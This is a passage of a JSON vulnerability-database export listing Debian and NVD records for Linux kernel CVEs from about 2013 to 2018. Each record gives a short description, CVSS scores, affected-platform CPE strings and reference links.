"AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3181"], "modified": "2014-09-28T10:55:00", "id": "DEBIANCVE:CVE-2014-3181", "href": "https://security-tracker.debian.org/tracker/CVE-2014-3181", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-01T10:10:50", "description": "The security_context_to_sid_core function in security/selinux/ss/services.c in the Linux kernel before 3.13.4 allows local users to cause a denial of service (system crash) by leveraging the CAP_MAC_ADMIN capability to set a zero-length security context.", "cvss3": {}, "published": "2014-02-28T06:18:00", "type": "debiancve", "title": "CVE-2014-1874", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1874"], "modified": "2014-02-28T06:18:00", "id": "DEBIANCVE:CVE-2014-1874", "href": "https://security-tracker.debian.org/tracker/CVE-2014-1874", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-05-31T18:11:35", "description": "The Linux kernel before 3.12, when UDP Fragmentation Offload (UFO) is enabled, does not properly initialize certain data structures, which allows local users to cause a denial of service (memory corruption and system crash) or possibly gain privileges via a crafted application that uses the UDP_CORK option in a setsockopt system call and sends both short and long packets, related to the ip_ufo_append_data function in net/ipv4/ip_output.c and the ip6_ufo_append_data function in net/ipv6/ip6_output.c.", "cvss3": {}, "published": "2013-11-04T15:55:00", "type": "debiancve", "title": "CVE-2013-4470", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4470"], "modified": "2013-11-04T15:55:00", "id": "DEBIANCVE:CVE-2013-4470", "href": "https://security-tracker.debian.org/tracker/CVE-2013-4470", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-01T10:10:50", "description": "Use-after-free vulnerability in the skb_segment function in net/core/skbuff.c in the Linux kernel through 3.13.6 allows attackers to obtain sensitive information from kernel memory by leveraging the absence of a certain orphaning operation.", "cvss3": {}, "published": "2014-03-24T16:40:00", "type": "debiancve", "title": "CVE-2014-0131", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 5.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.9, "vectorString": "AV:A/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0131"], "modified": "2014-03-24T16:40:00", "id": "DEBIANCVE:CVE-2014-0131", "href": "https://security-tracker.debian.org/tracker/CVE-2014-0131", "cvss": {"score": 2.9, "vector": "AV:A/AC:M/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2023-05-31T14:08:27", "description": "A missing authorization check in the fscrypt_process_policy function in fs/crypto/policy.c in the ext4 and f2fs filesystem encryption support in the Linux kernel before 4.7.4 allows a user to assign an encryption policy to a directory owned by a different user, potentially creating a denial of service.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-04-04T16:59:00", "type": "cve", "title": "CVE-2016-10318", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10318"], "modified": "2017-04-11T15:32:00", "cpe": ["cpe:/o:linux:linux_kernel:4.7.3"], "id": "CVE-2016-10318", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10318", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.7.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-01T10:28:52", "description": "The vfe31_proc_general function in drivers/media/video/msm/vfe/msm_vfe31.c in the MSM-VFE31 driver for the Linux kernel 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, does not validate a certain id value, which allows attackers to gain privileges or cause a denial of service (memory corruption) via an application that makes a crafted ioctl call.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-08-07T21:59:00", "type": "cve", "title": "CVE-2014-9410", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9410"], "modified": "2020-11-17T14:15:00", "cpe": ["cpe:/o:linux:linux_kernel:3.19.8"], "id": "CVE-2014-9410", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9410", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.19.8:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-01T10:30:14", "description": "The regulator_ena_gpio_free function in drivers/regulator/core.c in the Linux kernel before 3.19 allows local users to gain privileges or cause a denial of service (use-after-free) via a crafted application.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-05-02T21:59:00", "type": "cve", "title": "CVE-2014-9940", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9940"], "modified": "2017-11-04T01:29:00", "cpe": ["cpe:/o:linux:linux_kernel:3.18.52", "cpe:/o:google:android:7.1.1"], "id": "CVE-2014-9940", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9940", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.18.52:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:7.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-01T02:16:26", "description": "Out-of-bounds memory read in the x509_decode_time function in x509_cert_parser.c in Linux kernels 4.3-rc1 and after.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-09-25T21:29:00", "type": "cve", "title": "CVE-2015-5327", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5327"], "modified": "2019-03-07T15:02:00", "cpe": ["cpe:/o:linux:linux_kernel:4.3"], "id": "CVE-2015-5327", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5327", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.3:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.3:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.3:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.3:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.3:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.3:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.3:rc3:*:*:*:*:*:*"]}, {"lastseen": "2023-05-31T14:22:22", "description": "Use-after-free vulnerability in mm/percpu.c in the Linux kernel through 4.6 allows local users to cause a denial of service (BUG) or possibly have unspecified other impact via crafted use of the mmap and bpf system calls.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-23T10:59:00", "type": "cve", "title": "CVE-2016-4794", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4794"], "modified": "2023-02-16T02:32:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "CVE-2016-4794", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4794", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2023-06-01T10:28:54", "description": "The batadv_frag_merge_packets function in net/batman-adv/fragmentation.c in the B.A.T.M.A.N. implementation in the Linux kernel through 3.18.1 uses an incorrect length field during a calculation of an amount of memory, which allows remote attackers to cause a denial of service (mesh-node system crash) via fragmented packets.", "cvss3": {}, "published": "2015-01-02T21:59:00", "type": "cve", "title": "CVE-2014-9428", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9428"], "modified": "2023-01-20T03:02:00", "cpe": [], "id": "CVE-2014-9428", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9428", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": []}, {"lastseen": "2023-06-01T10:25:55", "description": "The paravirt_ops_setup function in arch/x86/kernel/kvm.c in the Linux kernel through 3.18 uses an improper paravirt_enabled setting for KVM guest kernels, which makes it easier for guest OS users to bypass the ASLR protection mechanism via a crafted application that reads a 16-bit value.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 3.3, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2014-12-12T18:59:00", "type": "cve", "title": "CVE-2014-8134", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8134"], "modified": "2023-02-13T00:43:00", "cpe": ["cpe:/o:suse:suse_linux_enterprise_server:11", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:opensuse:opensuse:13.1", "cpe:/o:oracle:linux:6", "cpe:/o:linux:linux_kernel:3.18", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:opensuse:evergreen:11.4"], "id": "CVE-2014-8134", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8134", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:6:-:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "cpe:2.3:o:opensuse:evergreen:11.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.18:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_server:11:sp2:*:*:ltss:*:*:*"]}, {"lastseen": "2023-05-31T14:52:30", "description": "The dm_get_from_kobject function in drivers/md/dm.c in the Linux kernel before 4.14.3 allow local users to cause a denial of service (BUG) by leveraging a race condition with __dm_destroy during creation and removal of DM devices.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-02-27T20:29:00", "type": "cve", "title": "CVE-2017-18203", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18203"], "modified": "2018-06-20T01:29:00", "cpe": [], "id": "CVE-2017-18203", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-18203", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": []}, {"lastseen": "2023-05-31T14:35:35", "description": "The keyctl_read_key function in security/keys/keyctl.c in the Key Management subcomponent in the Linux kernel before 4.13.5 does not properly consider that a key may be possessed but negatively instantiated, which allows local users to cause a denial of service (OOPS and system crash) via a crafted KEYCTL_READ operation.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-12T00:29:00", "type": "cve", "title": "CVE-2017-12192", "cwe": ["CWE-476"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12192"], "modified": "2023-02-12T23:28:00", "cpe": ["cpe:/o:linux:linux_kernel:4.13.4"], "id": "CVE-2017-12192", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12192", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.13.4:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-31T14:52:59", "description": "The timer_create syscall implementation in kernel/time/posix-timers.c in the Linux kernel before 4.14.8 doesn't properly validate the sigevent->sigev_notify field, which leads to out-of-bounds access in the show_timer function (called when /proc/$PID/timers is read). This allows userspace applications to read arbitrary kernel memory (on a kernel built with CONFIG_POSIX_TIMERS and CONFIG_CHECKPOINT_RESTORE).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-07-26T19:29:00", "type": "cve", "title": "CVE-2017-18344", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18344"], "modified": "2020-10-15T13:28:00", "cpe": ["cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:redhat:enterprise_linux_server_tus:7.4", "cpe:/o:redhat:enterprise_linux_server_aus:7.3", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.3", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_tus:7.3", "cpe:/o:redhat:enterprise_linux_server_aus:7.4", "cpe:/o:redhat:enterprise_linux_server_tus:7.2", "cpe:/a:redhat:mrg_realtime:2.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.5"], "id": "CVE-2017-18344", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-18344", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.3:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:mrg_realtime:2.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*"]}, {"lastseen": "2023-06-01T02:16:22", "description": "The (1) udp_recvmsg and (2) udpv6_recvmsg functions in the Linux kernel before 4.0.6 do not properly consider yielding a processor, which allows remote attackers to cause a denial of service (system hang) via incorrect checksums within a UDP packet flood.", "cvss3": {}, "published": "2015-08-31T10:59:00", "type": "cve", "title": "CVE-2015-5364", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5364"], "modified": "2023-02-02T19:17:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_aus:6.5", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:15.04"], "id": "CVE-2015-5364", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5364", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:-:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:6.5:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.04:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-31T14:14:13", "description": "Race condition in arch/x86/mm/tlb.c in the Linux kernel before 4.4.1 allows local users to gain privileges by triggering access to a paging structure by a different CPU.", "cvss3": {"exploitabilityScore": 1.4, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-27T17:59:00", "type": "cve", "title": "CVE-2016-2069", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2069"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:linux:linux_kernel:4.4"], "id": "CVE-2016-2069", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2069", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.4:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-01T02:25:08", "description": "drivers/infiniband/hw/cxgb3/iwch_cm.c in the Linux kernel before 4.5 does not properly identify error conditions, which allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free) via crafted packets.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-27T17:59:00", "type": "cve", "title": 